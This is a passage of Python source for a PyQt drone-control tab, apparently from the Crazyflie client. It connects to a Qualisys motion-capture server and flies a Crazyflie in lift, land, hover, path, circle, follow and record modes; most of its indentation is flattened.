self.flight_paths = Config().get("flight_paths")
except Exception as err:
logger.debug("No flight config")
self.flight_paths = self.default_flight_paths
if self.flight_paths == []:
self.flight_paths = self.default_flight_paths
        # Always wrap callbacks from the Crazyflie API through Qt Signals/Slots
# to avoid manipulating the UI when rendering it
self._connected_signal.connect(self._connected)
self._disconnected_signal.connect(self._disconnected)
self._log_data_signal.connect(self._log_data_received)
self._param_updated_signal.connect(self._param_updated)
self._flight_path_select_row.connect(self._select_flight_path_row)
self._flight_path_set_model.connect(self._set_flight_path_model)
self._path_selector_add_item.connect(self._add_path_selector_item)
self._path_selector_set_index.connect(self._set_path_selector_index)
self.statusChanged.connect(self._update_status)
self.cfStatusChanged.connect(self._update_cf_status)
self.qtmStatusChanged.connect(self._update_qtm_status)
# Connect the Crazyflie API callbacks to the signals
self._helper.cf.connected.add_callback(self._connected_signal.emit)
self._helper.cf.disconnected.add_callback(
self._disconnected_signal.emit)
# Connect the UI elements
self.connectQtmButton.clicked.connect(self.establish_qtm_connection)
self.landButton.clicked.connect(self.set_land_mode)
self.liftButton.clicked.connect(self.set_lift_mode)
self.followButton.clicked.connect(self.set_follow_mode)
self.emergencyButton.clicked.connect(self.set_kill_engine)
self.pathButton.clicked.connect(self.set_path_mode)
self.circleButton.clicked.connect(self.set_circle_mode)
self.recordButton.clicked.connect(self.set_record_mode)
self.removePathButton.clicked.connect(self.remove_current_path)
for i in range(len(self.flight_paths)):
self.pathSelector.addItem(self.flight_paths[i][0])
self.pathSelector.currentIndexChanged.connect(self.path_changed)
self.quadBox.currentIndexChanged[str].connect(self.quad_changed)
self.stickBox.currentIndexChanged[str].connect(self.stick_changed)
self.stickName = 'qstick'
self.quadName = 'crazyflie'
# Populate UI elements
self.posHoldPathBox.setText(str(self.position_hold_timelimit))
self.radiusBox.setText(str(self.circle_radius))
self.posHoldCircleBox.setText(str(self.position_hold_timelimit))
self.resolutionBox.setText(str(self.circle_resolution))
self.path_changed()
self._discovery = QDiscovery()
self._discovery.discoveringChanged.connect(self._is_discovering)
self._discovery.discoveredQTM.connect(self._qtm_discovered)
self.discoverQTM.clicked.connect(self._discovery.discover)
self._discovery.discover()
self._ui_update_timer = QTimer(self)
self._ui_update_timer.timeout.connect(self._update_ui)
def _setup_states(self):
parent_state = QState()
# DISCONNECTED
disconnected = QState(parent_state)
disconnected.assignProperty(self, "status", "Disabled")
disconnected.assignProperty(self.pathButton, "text", "Path Mode")
disconnected.assignProperty(self.followButton, "text", "Follow Mode")
disconnected.assignProperty(self.circleButton, "text", "Circle Mode")
disconnected.assignProperty(self.recordButton, "text", "Record Mode")
disconnected.assignProperty(self.pathButton, "enabled", False)
disconnected.assignProperty(self.emergencyButton, "enabled", False)
disconnected.assignProperty(self.landButton, "enabled", False)
disconnected.assignProperty(self.followButton, "enabled", False)
disconnected.assignProperty(self.liftButton, "enabled", False)
disconnected.assignProperty(self.circleButton, "enabled", False)
disconnected.assignProperty(self.recordButton, "enabled", False)
disconnected.entered.connect(self._flight_mode_disconnected_entered)
# HOVERING
hovering = QState(parent_state)
hovering.assignProperty(self, "status", "Hovering...")
hovering.assignProperty(self.pathButton, "text", "Path Mode")
hovering.assignProperty(self.followButton, "text", "Follow Mode")
hovering.assignProperty(self.circleButton, "text", "Circle Mode")
hovering.assignProperty(self.recordButton, "text", "Record Mode")
hovering.assignProperty(self.pathButton, "enabled", True)
hovering.assignProperty(self.emergencyButton, "enabled", True)
hovering.assignProperty(self.landButton, "enabled", True)
hovering.assignProperty(self.followButton, "enabled", True)
hovering.assignProperty(self.liftButton, "enabled", False)
hovering.assignProperty(self.circleButton, "enabled", True)
hovering.assignProperty(self.recordButton, "enabled", True)
hovering.entered.connect(self._flight_mode_hovering_entered)
# GROUNDED
grounded = QState(parent_state)
grounded.assignProperty(self, "status", "Landed")
grounded.assignProperty(self.pathButton, "text", "Path Mode")
grounded.assignProperty(self.followButton, "text", "Follow Mode")
grounded.assignProperty(self.circleButton, "text", "Circle Mode")
grounded.assignProperty(self.recordButton, "text", "Record Mode")
grounded.assignProperty(self.pathButton, "enabled", True)
grounded.assignProperty(self.emergencyButton, "enabled", True)
grounded.assignProperty(self.landButton, "enabled", False)
grounded.assignProperty(self.followButton, "enabled", False)
grounded.assignProperty(self.liftButton, "enabled", True)
grounded.assignProperty(self.circleButton, "enabled", True)
grounded.assignProperty(self.recordButton, "enabled", True)
grounded.entered.connect(self._flight_mode_grounded_entered)
# PATH
path = QState(parent_state)
path.assignProperty(self, "status", "Path Mode")
path.assignProperty(self.pathButton, "text", "Stop")
path.assignProperty(self.followButton, "text", "Follow Mode")
path.assignProperty(self.circleButton, "text", "Circle Mode")
path.assignProperty(self.recordButton, "text", "Record Mode")
path.assignProperty(self.pathButton, "enabled", True)
path.assignProperty(self.emergencyButton, "enabled", True)
path.assignProperty(self.landButton, "enabled", True)
path.assignProperty(self.followButton, "enabled", False)
path.assignProperty(self.liftButton, "enabled", False)
path.assignProperty(self.circleButton, "enabled", False)
path.assignProperty(self.recordButton, "enabled", False)
path.entered.connect(self._flight_mode_path_entered)
# FOLLOW
follow = QState(parent_state)
follow.assignProperty(self, "status", "Follow Mode")
follow.assignProperty(self.pathButton, "text", "Path Mode")
follow.assignProperty(self.followButton, "text", "Stop")
follow.assignProperty(self.circleButton, "text", "Circle Mode")
follow.assignProperty(self.recordButton, "text", "Record Mode")
follow.assignProperty(self.pathButton, "enabled", False)
follow.assignProperty(self.emergencyButton, "enabled", True)
follow.assignProperty(self.landButton, "enabled", True)
follow.assignProperty(self.followButton, "enabled", False)
follow.assignProperty(self.liftButton, "enabled", False)
follow.assignProperty(self.circleButton, "enabled", False)
follow.assignProperty(self.recordButton, "enabled", False)
follow.entered.connect(self._flight_mode_follow_entered)
# LIFT
lift = QState(parent_state)
lift.assignProperty(self, "status", "Lifting...")
lift.assignProperty(self.pathButton, "enabled", False)
lift.assignProperty(self.emergencyButton, "enabled", True)
lift.assignProperty(self.landButton, "enabled", True)
lift.assignProperty(self.followButton, "enabled", False)
lift.assignProperty(self.liftButton, "enabled", False)
lift.assignProperty(self.circleButton, "enabled", False)
lift.assignProperty(self.recordButton, "enabled", False)
lift.entered.connect(self._flight_mode_lift_entered)
# LAND
land = QState(parent_state)
land.assignProperty(self, "status", "Landing...")
land.assignProperty(self.pathButton, "enabled", False)
land.assignProperty(self.emergencyButton, "enabled", True)
land.assignProperty(self.landButton, "enabled", False)
land.assignProperty(self.followButton, "enabled", False)
land.assignProperty(self.liftButton, "enabled", False)
land.assignProperty(self.circleButton, "enabled", False)
land.assignProperty(self.recordButton, "enabled", False)
land.entered.connect(self._flight_mode_land_entered)
# CIRCLE
circle = QState(parent_state)
circle.assignProperty(self, "status", "Circle Mode")
circle.assignProperty(self.pathButton, "text", "Path Mode")
circle.assignProperty(self.followButton, "text", "Follow Mode")
circle.assignProperty(self.circleButton, "text", "Stop")
circle.assignProperty(self.recordButton, "text", "Record Mode")
circle.assignProperty(self.pathButton, "enabled", False)
circle.assignProperty(self.emergencyButton, "enabled", True)
circle.assignProperty(self.landButton, "enabled", True)
circle.assignProperty(self.followButton, "enabled", False)
circle.assignProperty(self.liftButton, "enabled", False)
circle.assignProperty(self.circleButton, "enabled", True)
circle.assignProperty(self.recordButton, "enabled", False)
circle.entered.connect(self._flight_mode_circle_entered)
# RECORD
record = QState(parent_state)
record.assignProperty(self, "status", "Record Mode")
record.assignProperty(self.pathButton, "text", "Path Mode")
record.assignProperty(self.followButton, "text", "Follow Mode")
record.assignProperty(self.circleButton, "text", "Circle Mode")
record.assignProperty(self.recordButton, "text", "Stop")
record.assignProperty(self.pathButton, "enabled", False)
record.assignProperty(self.emergencyButton, "enabled", True)
record.assignProperty(self.landButton, "enabled", False)
record.assignProperty(self.followButton, "enabled", False)
record.assignProperty(self.liftButton, "enabled", False)
record.assignProperty(self.circleButton, "enabled", False)
record.assignProperty(self.recordButton, "enabled", True)
record.entered.connect(self._flight_mode_record_entered)
def add_transition(mode, child_state, parent):
transition = FlightModeTransition(mode)
transition.setTargetState(child_state)
parent.addTransition(transition)
add_transition(FlightModeStates.LAND, land, parent_state)
add_transition(FlightModeStates.LIFT, lift, parent_state)
add_transition(FlightModeStates.FOLLOW, follow, parent_state)
add_transition(FlightModeStates.PATH, path, parent_state)
add_transition(FlightModeStates.HOVERING, hovering, parent_state)
add_transition(FlightModeStates.GROUNDED, grounded, parent_state)
add_transition(FlightModeStates.DISCONNECTED, disconnected,
parent_state)
add_transition(FlightModeStates.CIRCLE, circle, parent_state)
add_transition(FlightModeStates.RECORD, record, parent_state)
parent_state.setInitialState(disconnected)
self._machine.addState(parent_state)
self._machine.setInitialState(parent_state)
self._machine.start()
def _update_flight_status(self):
prev_flying_enabled = self.flying_enabled
self.flying_enabled = self._cf is not None and \
self._qtm_connection is not None
if not prev_flying_enabled and self.flying_enabled:
self.switch_flight_mode(FlightModeStates.GROUNDED)
t = threading.Thread(target=self.flight_controller)
t.start()
if prev_flying_enabled and not self.flying_enabled:
self.switch_flight_mode(FlightModeStates.DISCONNECTED)
def _is_discovering(self, discovering):
if discovering:
self.qtmIpBox.clear()
self.discoverQTM.setEnabled(not discovering)
def _qtm_discovered(self, info, ip):
self.qtmIpBox.addItem("{} {}".format(ip, info))
@pyqtSlot(str)
def _update_status(self, status):
self.statusLabel.setText("Status: {}".format(status))
@pyqtSlot(str)
def _update_cf_status(self, status):
self.cfStatusLabel.setText(status)
@pyqtSlot(str)
def _update_qtm_status(self, status):
self.qtmStatusLabel.setText(status)
@pyqtSlot(str)
def quad_changed(self, quad):
self.quadName = quad
@pyqtSlot(str)
def stick_changed(self, stick):
self.stickName = stick
# Properties
@pyqtProperty(str, notify=statusChanged)
def status(self):
return self._status
@status.setter
def status(self, value):
if value != self._status:
self._status = value
self.statusChanged.emit(value)
@pyqtProperty(str, notify=qtmStatusChanged)
def qtmStatus(self):
return self._qtm_status
@qtmStatus.setter
def qtmStatus(self, value):
if value != self._qtm_status:
self._qtm_status = value
self.qtmStatusChanged.emit(value)
@pyqtProperty(str, notify=cfStatusChanged)
def cfStatus(self):
        return self._cf_status
@cfStatus.setter
def cfStatus(self, value):
if value != self._cf_status:
self._cf_status = value
self.cfStatusChanged.emit(value)
def _select_flight_path_row(self, row):
self.flightPathDataTable.selectRow(row)
def _set_flight_path_model(self, model):
self.flightPathDataTable.setModel(model)
def _add_path_selector_item(self, item):
self.pathSelector.addItem(item)
def _set_path_selector_index(self, index):
self.pathSelector.setCurrentIndex(index)
def path_changed(self):
if self.flight_mode == FlightModeStates.PATH:
self.switch_flight_mode(FlightModeStates.HOVERING)
time.sleep(0.1)
# Flight path ui table setup
self.model = QStandardItemModel(10, 4)
self.model.setHorizontalHeaderItem(0, QStandardItem('X (m)'))
self.model.setHorizontalHeaderItem(1, QStandardItem('Y (m)'))
self.model.setHorizontalHeaderItem(2, QStandardItem('Z (m)'))
self.model.setHorizontalHeaderItem(3, QStandardItem('Yaw (deg)'))
# Populate the table with data
if (len(self.flight_paths) == 0):
return
current = self.flight_paths[self.pathSelector.currentIndex()]
for i in range(1, len(current)):
for j in range(0, 4):
self.model.setItem(i - 1, j,
QStandardItem(str(current[i][j])))
self._flight_path_set_model.emit(self.model)
Config().set("flight_paths", self.flight_paths)
def remove_current_path(self):
if self.flight_mode == FlightModeStates.PATH:
self.switch_flight_mode(FlightModeStates.HOVERING)
time.sleep(0.1)
if len(self.flight_paths) == 0:
return
current_index = self.pathSelector.currentIndex()
answer = QMessageBox.question(
self, "CFClient: Qualisystab", "Delete the flightpath: {}?".format(
self.flight_paths[current_index][0]),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.flight_paths.pop(current_index)
self.pathSelector.clear()
for j in range(len(self.flight_paths)):
self.pathSelector.addItem(self.flight_paths[j][0])
if current_index == 0:
self.pathSelector.setCurrentIndex(0)
else:
self.pathSelector.setCurrentIndex(current_index - 1)
self.path_changed()
def set_lift_mode(self):
self.switch_flight_mode(FlightModeStates.LIFT)
def set_land_mode(self):
self.switch_flight_mode(FlightModeStates.LAND)
def set_circle_mode(self):
# Toggle circle mode on and off
if self.flight_mode == FlightModeStates.CIRCLE:
self.switch_flight_mode(FlightModeStates.HOVERING)
else:
try:
self.position_hold_timelimit = float(
self.posHoldCircleBox.text())
self.circle_radius = float(self.radiusBox.text())
self.circle_resolution = float(self.resolutionBox.text())
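                # Consecutive circle waypoints are circle_resolution degrees apart; the distance
                # threshold is twice the chord length 2*r*sin(resolution/2) between them.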
self.circle_pos_threshold = (2 * self.circle_radius * round(
math.sin(math.radians(
(self.circle_resolution / 2))), 4)) * 2
logger.info(self.circle_pos_threshold)
except ValueError as err:
self.status = ("illegal character used in circle"
" settings: {}").format(str(err))
logger.info(self.status)
return
self.switch_flight_mode(FlightModeStates.CIRCLE)
def set_record_mode(self):
# Toggle record mode on and off
if self.flight_mode == FlightModeStates.RECORD:
# Cancel the recording
self.recording = False
self.switch_flight_mode(FlightModeStates.GROUNDED)
self.land_for_recording = False
elif self.flight_mode != FlightModeStates.GROUNDED:
# If the cf is flying, start by landing
self.land_for_recording = True
self.switch_flight_mode(FlightModeStates.LAND)
else:
self.switch_flight_mode(FlightModeStates.RECORD)
def set_follow_mode(self):
# Toggle follow mode on and off
if self.flight_mode == FlightModeStates.FOLLOW:
self.switch_flight_mode(FlightModeStates.HOVERING)
else:
self.switch_flight_mode(FlightModeStates.FOLLOW)
def set_path_mode(self):
logger.info(self.model.item(0, 0))
# Toggle path mode on and off
# Path mode on, return to hovering
if self.flight_mode == FlightModeStates.PATH:
self.switch_flight_mode(FlightModeStates.HOVERING)
elif self.model.item(0, 0) is None:
self.status = "missing Flight Plan"
return
# Path mode off, read data from UI table and start path mode
else:
try:
self.position_hold_timelimit = float(
self.posHoldPathBox.text())
except ValueError as err:
self.status = ("illegal character used in path"
" settings: {}").format(str(err))
logger.info(self.status)
return
# Get the flightpath from the GUI table
x, y = 0, 0
temp = self.model.item(x, y)
reading_data = True
list = ''
while reading_data:
try:
element = str(temp.text())
if element != "":
list += temp.text()
# a "," gets added after the last element,
# remove that later for neatness
list += ','
try:
float(element)
except ValueError:
self._flight_path_select_row.emit(y)
self.status = ("Value at cell x:{} y:{} "
"must be a number").format(x, y)
logger.info(self.status)
break
x += 1
if x % 4 == 0:
x = 0
y += 1
# list += temp_position
# temp_position = []
temp = self.model.item(y, x)
except Exception as err:
reading_data = False
# remove the last "," element
list = list[:(len(list) - 1)]
list = list.split(',')
list = [float(i) for i in list]
if (len(list) % 4) != 0:
self.status = ("Missing value to create a valid"
" flight path")
logger.info(self.status)
break
list = [list[i:i + 4] for i in range(0, len(list), 4)]
list.insert(
0,
self.flight_paths[self.pathSelector.currentIndex()][0])
self.flight_paths[self.pathSelector.currentIndex()] = list
Config().set("flight_paths", self.flight_paths)
self.switch_flight_mode(FlightModeStates.PATH)
def set_kill_engine(self):
self.send_setpoint(Position(0, 0, 0))
self.switch_flight_mode(FlightModeStates.GROUNDED)
logger.info('Stop button pressed, kill engines')
def establish_qtm_connection(self):
if self.qtmIpBox.count() == 0 and self.qtmIpBox.currentText() == "":
return
if self._qtm_connection is None:
try:
ip = self.qtmIpBox.currentText().split(" ")[0]
except Exception as e:
logger.error("Incorrect entry: %s", e)
return
self.connectQtmButton.setEnabled(False)
start_async_task(self.qtm_connect(ip))
else:
self._qtm_connection.disconnect()
self._qtm_connection = None
async def qtm_connect(self, ip):
connection = await qtm.connect(
ip,
on_event=self.on_qtm_event,
on_disconnect=lambda reason: start_async_task(
self.on_qtm_disconnect(reason)))
if connection is None:
start_async_task(self.on_qtm_disconnect("Failed to connect"))
return
self._qtm_connection = connection
await self.setup_qtm_connection()
def setup_6dof_comboboxes(self):
quadName = self.quadName
stickName = self.stickName
self.quadBox.clear()
self.stickBox.clear()
for label in self.qtm_6DoF_labels:
self.quadBox.addItem(label)
self.stickBox.addItem(label)
if quadName in self.qtm_6DoF_labels:
self.quadBox.setCurrentIndex(
self.qtm_6DoF_labels.index(quadName))
if stickName in self.qtm_6DoF_labels:
self.stickBox.setCurrentIndex(
self.qtm_6DoF_labels.index(stickName))
async def setup_qtm_connection(self):
self.connectQtmButton.setEnabled(True)
self.connectQtmButton.setText('Disconnect QTM')
self.qtmStatus = ': connected : Waiting QTM to start sending data'
try:
result = await self._qtm_connection.get_parameters(
parameters=['6d'])
# Parse the returned xml
xml = ET.fromstring(result)
self.qtm_6DoF_labels = [label.text for label in xml.iter('Name')]
# Make all names lowercase
self.qtm_6DoF_labels = [x.lower() for x in self.qtm_6DoF_labels]
logger.info('6Dof bodies active in qtm: {}'.format(
self.qtm_6DoF_labels))
self.setup_6dof_comboboxes()
# Gui
self.qtmStatus = ': connected'
self.qtmCfPositionBox.setEnabled(True)
self.qtmWandPositionBox.setEnabled(True)
self.discoverQTM.setEnabled(False)
self.qtmIpBox.setEnabled(False)
self._update_flight_status()
self._ui_update_timer.start(200)
# Make sure this is the last thing done with the qtm_connection
# (due to qtmRTProtocol structure)
await self._qtm_connection.stream_frames(
components=['6deuler', '3d'], on_packet=self.on_packet)
except Exception as err:
logger.info(err)
async def on_qtm_disconnect(self, reason):
"""Callback when QTM has been disconnected"""
self._ui_update_timer.stop()
self._update_flight_status()
self._qtm_connection = None
logger.info(reason)
# Gui
self.qtmCfPositionBox.setEnabled(False)
self.qtmWandPositionBox.setEnabled(False)
self.discoverQTM.setEnabled(True)
self.qtmIpBox.setEnabled(True)
self.connectQtmButton.setEnabled(True)
self.connectQtmButton.setText('Connect QTM')
self.qtmStatus = ': not connected : {}'.format(
reason if reason is not None else '')
def on_qtm_event(self, event):
logger.info(event)
if event == qtm.QRTEvent.EventRTfromFileStarted:
self.qtmStatus = ': connected'
self.qtmCfPositionBox.setEnabled(True)
self.qtmWandPositionBox.setEnabled(True)
elif event == qtm.QRTEvent.EventRTfromFileStopped:
self.qtmStatus = ': connected : Waiting QTM to start sending data'
self.qtmCfPositionBox.setEnabled(False)
self.qtmWandPositionBox.setEnabled(False)
def on_packet(self, packet):
# Callback when QTM sends a 'packet' of the requested data,
# one every tracked frame.
# The speed depends on QTM settings
header, bodies = packet.get_6d_euler()
# Cf not created yet or no packet received due to various reasons...
# Wait for the two asynchronous calls in 'setup connection'
# to return with data
if bodies is None or self.qtm_6DoF_labels is None:
return
try:
temp_cf_pos = bodies[self.qtm_6DoF_labels.index(self.quadName)]
            # QTM returns positions in mm in the order x, y, z; the Crazyflie API needs
            # data in meters, so divide by a thousand
# QTM returns euler rotations in deg in the order
# yaw, pitch, roll, not Qualisys Standard!
self.cf_pos = Position(
temp_cf_pos[0][0] / 1000,
temp_cf_pos[0][1] / 1000,
temp_cf_pos[0][2] / 1000,
roll=temp_cf_pos[1][2],
pitch=temp_cf_pos[1][1],
yaw=temp_cf_pos[1][0])
except ValueError as err:
self.qtmStatus = ' : connected : No 6DoF body found'
try:
temp_wand_pos = bodies[self.qtm_6DoF_labels.index(self.stickName)]
self.wand_pos = Position(
temp_wand_pos[0][0] / 1000,
temp_wand_pos[0][1] / 1000,
temp_wand_pos[0][2] / 1000,
roll=temp_wand_pos[1][2],
pitch=temp_wand_pos[1][1],
yaw=temp_wand_pos[1][0])
except ValueError as err:
self.qtmStatus = ' : connected : No 6DoF body found'
if self._cf is not None and self.cf_pos.is_valid():
# If a cf exists and the position is valid
# Feed the current position of the cf back to the cf to
# allow for self correction
self._cf.extpos.send_extpos(self.cf_pos.x, self.cf_pos.y,
self.cf_pos.z)
def _update_ui(self):
# Update the data in the GUI
self.qualisysX.setText(("%0.4f" % self.cf_pos.x))
self.qualisysY.setText(("%0.4f" % self.cf_pos.y))
self.qualisysZ.setText(("%0.4f" % self.cf_pos.z))
self.qualisysRoll.setText(("%0.2f" % self.cf_pos.roll))
self.qualisysPitch.setText(("%0.2f" % self.cf_pos.pitch))
self.qualisysYaw.setText(("%0.2f" % self.cf_pos.yaw))
self.qualisysWandX.setText(("%0.4f" % self.wand_pos.x))
self.qualisysWandY.setText(("%0.4f" % self.wand_pos.y))
self.qualisysWandZ.setText(("%0.4f" % self.wand_pos.z))
self.qualisysWandRoll.setText(("%0.2f" % self.wand_pos.roll))
self.qualisysWandPitch.setText(("%0.2f" % self.wand_pos.pitch))
self.qualisysWandYaw.setText(("%0.2f" % self.wand_pos.yaw))
def _flight_mode_land_entered(self):
self.current_goal_pos = self.valid_cf_pos
logger.info('Trying to land at: x: {} y: {}'.format(
self.current_goal_pos.x, self.current_goal_pos.y))
self.land_rate = 1
self._event.set()
def _flight_mode_path_entered(self):
self.path_index = 1
current = self.flight_paths[self.pathSelector.currentIndex()]
self.current_goal_pos = Position(
current[self.path_index][0],
current[self.path_index][1],
current[self.path_index][2],
yaw=current[self.path_index][3])
logger.info('Setting position {}'.format(
self.current_goal_pos))
self._flight_path_select_row.emit(self.path_index - 1)
self._event.set()
def _flight_mode_circle_entered(self):
self.current_goal_pos = Position(
round(math.cos(math.radians(self.circle_angle)),
8) * self.circle_radius,
round(math.sin(math.radians(self.circle_angle)), 8)
* self.circle_radius,
self.circle_height,
yaw=self.circle_angle)
logger.info('Setting position {}'.format(
self.current_goal_pos))
self._event.set()
def _flight_mode_follow_entered(self):
self.last_valid_wand_pos = Position(0, 0, 1)
self._event.set()
def _flight_mode_record_entered(self):
self.new_path = []
self._event.set()
def _flight_mode_lift_entered(self):
self.current_goal_pos = self.valid_cf_pos
logger.info('Trying to lift at: {}'.format(
self.current_goal_pos))
self._event.set()
def _flight_mode_hovering_entered(self):
self.current_goal_pos = self.valid_cf_pos
logger.info('Hovering at: {}'.format(
self.current_goal_pos))
self._event.set()
def _flight_mode_grounded_entered(self):
self._event.set()
def _flight_mode_disconnected_entered(self):
self._event.set()
def flight_controller(self):
try:
logger.info('Starting flight controller thread')
self._cf.param.set_value('stabilizer.estimator', '2')
self.reset_estimator(self._cf)
self._cf.param.set_value('flightmode.posSet', '1')
time.sleep(0.1)
# The threshold for how many frames without tracking
# is allowed before the cf's motors are stopped
lost_tracking_threshold = 100
frames_without_tracking = 0
position_hold_timer = 0
self.circle_angle = 0.0
# The main flight control loop, the behaviour
# is controlled by the state of "FlightMode"
while self.flying_enabled:
# Check that the position is valid and store it
if self.cf_pos.is_valid():
self.valid_cf_pos = self.cf_pos
frames_without_tracking = 0
else:
# if it isn't, count number of frames
frames_without_tracking += 1
if frames_without_tracking > lost_tracking_threshold:
self.switch_flight_mode(FlightModeStates.GROUNDED)
self.status = "Tracking lost, turning off motors"
logger.info(self.status)
# If the cf is upside down, kill the motors
if self.flight_mode != FlightModeStates.GROUNDED and (
self.valid_cf_pos.roll > 120
or self.valid_cf_pos.roll < -120):
self.switch_flight_mode(FlightModeStates.GROUNDED)
self.status = "Status: Upside down, turning off motors"
logger.info(self.status)
# Switch on the FlightModeState and take actions accordingly
# Wait so that any on state change actions are completed
self._event.wait()
if self.flight_mode == FlightModeStates.LAND:
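                    # Descend by repeatedly lowering the z setpoint: the target height is the
                    # stored goal z divided by land_rate, which grows by 10% every time the
                    # Crazyflie reaches the current setpoint; motors are cut once land_rate > 1000.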
self.send_setpoint(
Position(
self.current_goal_pos.x,
self.current_goal_pos.y,
(self.current_goal_pos.z / self.land_rate),
yaw=0))
# Check if the cf has reached the position,
# if it has set a new position
if self.valid_cf_pos.distance_to(
Position(self.current_goal_pos.x,
self.current_goal_pos.y,
self.current_goal_pos.z / self.land_rate
)) < self.path_pos_threshold:
self.land_rate *= 1.1
if self.land_rate > 1000:
self.send_setpoint(Position(0, 0, 0))
if self.land_for_recording:
# Return the control to the recording mode
# after landing
mode = FlightModeStates.RECORD
self.land_for_recording = False
else:
# Regular landing
mode = FlightModeStates.GROUNDED
self.switch_flight_mode(mode)
elif self.flight_mode == FlightModeStates.PATH:
self.send_setpoint(self.current_goal_pos)
# Check if the cf has reached the goal position,
# if it has set a new goal position
if self.valid_cf_pos.distance_to(
self.current_goal_pos) < self.path_pos_threshold:
if position_hold_timer > self.position_hold_timelimit:
current = self.flight_paths[
self.pathSelector.currentIndex()]
self.path_index += 1
if self.path_index == len(current):
self.path_index = 1
position_hold_timer = 0
self.current_goal_pos = Position(
current[self.path_index][0],
current[self.path_index][1],
current[self.path_index][2],
yaw=current[self.path_index][3])
logger.info('Setting position {}'.format(
self.current_goal_pos))
self._flight_path_select_row.emit(
self.path_index - 1)
elif position_hold_timer == 0:
time_of_pos_reach = time.time()
                            # Add some time just to get going,
# it will be overwritten in the next step.
# Setting it higher than the limit
# will break the code.
position_hold_timer = 0.0001
else:
position_hold_timer = time.time(
) - time_of_pos_reach
elif self.flight_mode == FlightModeStates.CIRCLE:
self.send_setpoint(self.current_goal_pos)
# Check if the cf has reached the goal position,
# if it has set a new goal position
if self.valid_cf_pos.distance_to(
self.current_goal_pos) < self.circle_pos_threshold:
if position_hold_timer >= self.position_hold_timelimit:
position_hold_timer = 0
# increment the angle
self.circle_angle = ((self.circle_angle +
self.circle_resolution)
% 360)
# Calculate the next position in
# the circle to fly to
self.current_goal_pos = Position(
round(
math.cos(math.radians(self.circle_angle)),
4) * self.circle_radius,
round(
math.sin(math.radians(self.circle_angle)),
4) * self.circle_radius,
self.circle_height,
yaw=self.circle_angle)
logger.info('Setting position {}'.format(
self.current_goal_pos))
elif position_hold_timer == 0:
time_of_pos_reach = time.time()
                            # Add some time just to get going, it will be
                            # overwritten in the next step.
                            # Setting it higher than the limit will
                            # break the code.
position_hold_timer = 0.0001
else:
position_hold_timer = time.time(
) - time_of_pos_reach
elif self.flight_mode == FlightModeStates.FOLLOW:
if self.wand_pos.is_valid():
self.last_valid_wand_pos = self.wand_pos
# Fit the angle of the wand in the interval 0-4
self.length_from_wand = (2 * (
(self.wand_pos.roll + 90) / 180) - 1) + 2
self.send_setpoint(
Position(
self.wand_pos.x + round(
math.cos(math.radians(self.wand_pos.yaw)),
4) * self.length_from_wand,
self.wand_pos.y + round(
math.sin(math.radians(self.wand_pos.yaw)),
4) * self.length_from_wand,
((self.wand_pos.z + round(
math.sin(
math.radians(self.wand_pos.pitch)), 4)
* self.length_from_wand) if
((self.wand_pos.z + round(
math.sin(
math.radians(self.wand_pos.pitch)), 4)
* self.length_from_wand) > 0) else 0)))
else:
self.length_from_wand = (2 * (
(self.last_valid_wand_pos.roll + 90) / 180) -
1) + 2
self.send_setpoint(
Position(
self.last_valid_wand_pos.x + round(
math.cos(
math.radians(
self.last_valid_wand_pos.yaw)),
4) * self.length_from_wand,
self.last_valid_wand_pos.y + round(
math.sin(
math.radians(
self.last_valid_wand_pos.yaw)),
4) * self.length_from_wand,
int(self.last_valid_wand_pos.z + round(
math.sin(
math.radians(self.last_valid_wand_pos.
pitch)), 4) *
self.length_from_wand)))
elif self.flight_mode == FlightModeStates.LIFT:
self.send_setpoint(
Position(self.current_goal_pos.x,
self.current_goal_pos.y, 1))
if self.valid_cf_pos.distance_to(
Position(self.current_goal_pos.x,
self.current_goal_pos.y, 1)) < 0.05:
                        # Wait for the Crazyflie to reach the goal
self.switch_flight_mode(FlightModeStates.HOVERING)
elif self.flight_mode == FlightModeStates.HOVERING:
self.send_setpoint(self.current_goal_pos)
elif self.flight_mode == FlightModeStates.RECORD:
if self.valid_cf_pos.z > 1.0 and not self.recording:
# Start recording when the cf is lifted
self.recording = True
# Start the timer thread
self.save_current_position()
# Gui
self.status = "Recording Flightpath"
logger.info(self.status)
elif self.valid_cf_pos.z < 0.03 and self.recording:
# Stop the recording when the cf is put on
# the ground again
logger.info("Recording stopped")
self.recording = False
# Remove the last bit (1s) of the recording,
# containing setting the cf down
for self.path_index in range(20):
self.new_path.pop()
# Add the new path to list and Gui
now = datetime.datetime.fromtimestamp(time.time())
new_name = ("Recording {}/{}/{} {}:{}".format(
now.year - 2000, now.month
if now.month > 9 else "0{}".format(now.month),
now.day if now.day > 9 else "0{}".format(now.day),
now.hour if now.hour > 9 else "0{}".format(
now.hour), now.minute
if now.minute > 9 else "0{}".format(now.minute)))
self.new_path.insert(0, new_name)
self.flight_paths.append(self.new_path)
self._path_selector_add_item.emit(new_name)
# Select the new path
self._path_selector_set_index.emit(
len(self.flight_paths) - 1)
self.path_changed()
Config().set("flight_paths", self.flight_paths)
# Wait while the operator moves away
self.status = "Replay in 3s"
time.sleep(1)
self.status = "Replay in 2s"
time.sleep(1)
self.status = "Replay in 1s"
time.sleep(1)
# Switch to path mode and replay the recording
self.switch_flight_mode(FlightModeStates.PATH)
elif self.flight_mode == FlightModeStates.GROUNDED:
pass  # If grounded, the control is switched back to the gamepad
time.sleep(0.001)
except Exception as err:
logger.error(err)
self.cfStatus = str(err)
logger.info('Terminating flight controller thread')
def save_current_position(self):
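"""Sample the Crazyflie position at roughly 20 Hz while recording.
Re-arms a 0.05 s threading.Timer and appends [x, y, z, yaw] to the
current path until recording stops."""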
if self.recording:
# Restart the timer
threading.Timer(0.05, self.save_current_position).start()
# Save the current position
self.new_path.append([
self.valid_cf_pos.x, self.valid_cf_pos.y,
self.valid_cf_pos.z, self.valid_cf_pos.yaw
])
def _connected(self, link_uri):
"""Callback when the Crazyflie has been connected"""
self._cf = self._helper.cf
self._update_flight_status()
logger.debug("Crazyflie connected to {}".format(link_uri))
# Gui
self.cfStatus = ': connected'
def _disconnected(self, link_uri):
"""Callback for when the Crazyflie has been disconnected"""
logger.info("Crazyflie disconnected from {}".format(link_uri))
self.cfStatus = ': not connected'
self._cf = None
self._update_flight_status()
def _param_updated(self, name, value):
"""Callback when the registered parameter get's updated"""
logger.debug("Updated {0} to {1}".format(name, value))
def _log_data_received(self, timestamp, data, log_conf):
"""Callback when the log layer receives new data"""
logger.debug("{0}:{1}:{2}".format(timestamp, log_conf.name, data))
def _logging_error(self, log_conf, msg):
